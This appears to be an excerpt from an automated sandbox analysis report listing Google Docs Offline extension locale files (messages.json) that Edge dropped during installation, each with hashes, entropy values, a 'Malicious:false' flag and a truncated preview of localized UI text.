                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\am\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1285
                                                                                        Entropy (8bit):4.702209356847184
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ar\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1244
                                                                                        Entropy (8bit):4.5533961615623735
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\az\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):977
                                                                                        Entropy (8bit):4.867640976960053
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\be\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):3107
                                                                                        Entropy (8bit):3.535189746470889
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\bg\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1389
                                                                                        Entropy (8bit):4.561317517930672
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\bn\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1763
                                                                                        Entropy (8bit):4.25392954144533
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ca\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):930
                                                                                        Entropy (8bit):4.569672473374877
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\cs\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):913
                                                                                        Entropy (8bit):4.947221919047
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\cy\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):806
                                                                                        Entropy (8bit):4.815663786215102
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\da\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):883
                                                                                        Entropy (8bit):4.5096240460083905
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\de\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1031
                                                                                        Entropy (8bit):4.621865814402898
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\el\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1613
                                                                                        Entropy (8bit):4.618182455684241
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\en\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):851
                                                                                        Entropy (8bit):4.4858053753176526
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):851
                                                                                        Entropy (8bit):4.4858053753176526
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):848
                                                                                        Entropy (8bit):4.494568170878587
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\en_US\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1425
                                                                                        Entropy (8bit):4.461560329690825
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\es\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):961
                                                                                        Entropy (8bit):4.537633413451255
                                                                                        Encrypted:false
